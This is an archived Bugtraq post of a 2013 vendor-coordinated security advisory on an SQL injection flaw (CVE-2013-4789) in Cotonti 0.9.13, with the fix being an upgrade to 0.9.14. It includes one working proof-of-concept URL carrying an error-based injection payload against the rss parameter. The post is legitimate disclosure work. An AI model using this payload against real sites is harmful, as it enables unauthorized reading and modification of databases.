[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: SQL Injection in Cotonti
From: advisory () htbridge ! com
Date: 2013-07-31 10:53:19
Message-ID: 20130731105319.CC9052C4C0CF () htbridge ! ch
[Download RAW message or body]
Advisory ID: HTB23164
Product: Cotonti
Vendor: Cotonti Team
Vulnerable Version(s): 0.9.13 and probably prior
Tested Version: 0.9.13
Vendor Notification: July 10, 2013
Vendor Patch: July 17, 2013
Public Disclosure: July 31, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-4789
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Cotonti, which can \
be exploited to perform SQL injection attacks against vulnerable application. A \
remote attacker can read, modify or delete data in application's database and even \
gain complete control over the application under certain circumstances.
1) SQL Injection in Cotonti: CVE-2013-4789
The vulnerability exists due to insufficient filtration of the "c" HTTP GET parameter \
passed to "/index.php" script when HTTP GET "e" parameter is set to "rss". A remote \
unauthenticated attacker can execute arbitrary SQL commands in application's \
database.
The following PoC code displays version of MySQL server:
http://[host]/index.php?e=rss&c=%27and%28select%201%20from%28select%20count%28*%29%2cc \
oncat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to Cotonti 0.9.14
More Information:
http://www.cotonti.com/news/announce/siena_0914_released
http://www.cotonti.com/forums?m=posts&q=7475
https://github.com/Cotonti/Cotonti/commit/45eec046391afabb676b62b9201da0cd530360b4
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23164 - https://www.htbridge.com/advisory/HTB23164 - \
SQL Injection in Cotonti. [2] Cotonti - http://www.cotonti.com/ - Cotonti is a \
powerful open-source web development framework and content manager with a focus on \
security, speed and flexibility. [3] Common Vulnerabilities and Exposures (CVE) - \
http://cve.mitre.org/ - international in scope and free for public use, CVE ® is a \
dictionary of publicly known information security vulnerabilities and exposures. [4] \
Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and \
security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic